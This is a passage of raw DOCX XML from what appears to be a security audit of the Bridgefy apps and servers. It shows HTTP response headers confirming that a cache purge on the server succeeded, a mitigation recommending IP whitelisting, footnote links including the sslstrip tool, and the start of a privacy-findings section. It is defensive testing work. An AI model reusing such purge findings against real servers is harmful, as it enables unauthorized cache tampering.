        <w:ind w:left="720" w:right="6029" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>content-type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>application/json </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>fastly-instant-rate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: 0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>accept-ranges</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>bytes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487633408">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>130778</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="118" name="Graphic 118"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="118" name="Graphic 118"/>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0.297485pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15683072;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape88" coordorigin="1440,206" coordsize="2880,0" path="m1440,206l4320,206e" filled="false" stroked="true" strokeweight=".75pt" strokecolor="#000000">
                <v:path arrowok="t"/>
                <v:stroke dashstyle="solid"/>
                <w10:wrap type="topAndBottom"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="110"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>183</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId274">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://moxie.org/software/sslstrip/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>184</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="58"/>
          <w:w w:val="150"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId275">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://www.tunetheweb.com/blog/dangerous-web-security-features/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="112"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: Sun, 22 Jan 2023 15:29:22 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GMT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>x-varnish</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>504912106</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: 1.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>varnish</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>x-served-by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: cache-del21740-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DEL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>alt-svc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>27=":443";ma=86400</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>content-length</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>50</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="63"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>{ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"status"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"ok"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"id"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"21740-1674089155-78159" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="369"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1C1B29"/>
        </w:rPr>
        <w:t>It is recommended to prevent cache purges from unauthorized hosts. This may be accomplished via IP whitelisting and/or making the relevant endpoints only available</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1C1B29"/>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1C1B29"/>
        </w:rPr>
        <w:t>from trusted internal networks. For additional mitigation guidance, please refer to the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="1C1B29"/>
        </w:rPr>
        <w:t>Cache Invalidation </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1C1B29"/>
        </w:rPr>
        <w:t>tutorial</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1C1B29"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>185</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1C1B29"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>, from the official </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="1C1B29"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Varnish </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1C1B29"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>documentation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>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6"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487633920">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>209572</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="119" name="Graphic 119"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="119" name="Graphic 119"/>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6.501759pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15682560;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape89" coordorigin="1440,330" coordsize="2880,0" path="m1440,330l4320,330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2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>185</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="37"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId276">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://docs.varnish-software.com/tutorials/cache-invalidation/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="320"/>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250013" w:id="42"/>
      <w:r>
        <w:rPr>
          <w:color w:val="002F7B"/>
        </w:rPr>
        <w:t>Privacy Analysis </w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
      <w:r>
        <w:rPr>
          <w:color w:val="002F7B"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto" w:before="353"/>
        <w:ind w:left="720" w:right="364"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This section covers the privacy-related analysis results that attempt to answer 12 questions for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>WP6 - Privacy tests against Bridgefy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Android</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>iOS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>apps,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>SDK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Servers</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. For this portion of the engagement, the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>7ASecurity </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>team utilizes the following classification to specify the level of certainty regarding the documented findings. Given that this research occurred on the basis of reverse-engineering, and source code analysis, it is necessary to classify the findings to address the level of confidence that can be assumed for each discovery:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1439" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Proven</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Source</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>runtime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>activity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>clearly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>confirm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>finding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>fact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="1440" w:right="377" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF9900"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Evident</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>: Source code strongly suggests a privacy concern, but this could not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>be proven at runtime</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="370" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="37751C"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Assumed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Indications</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
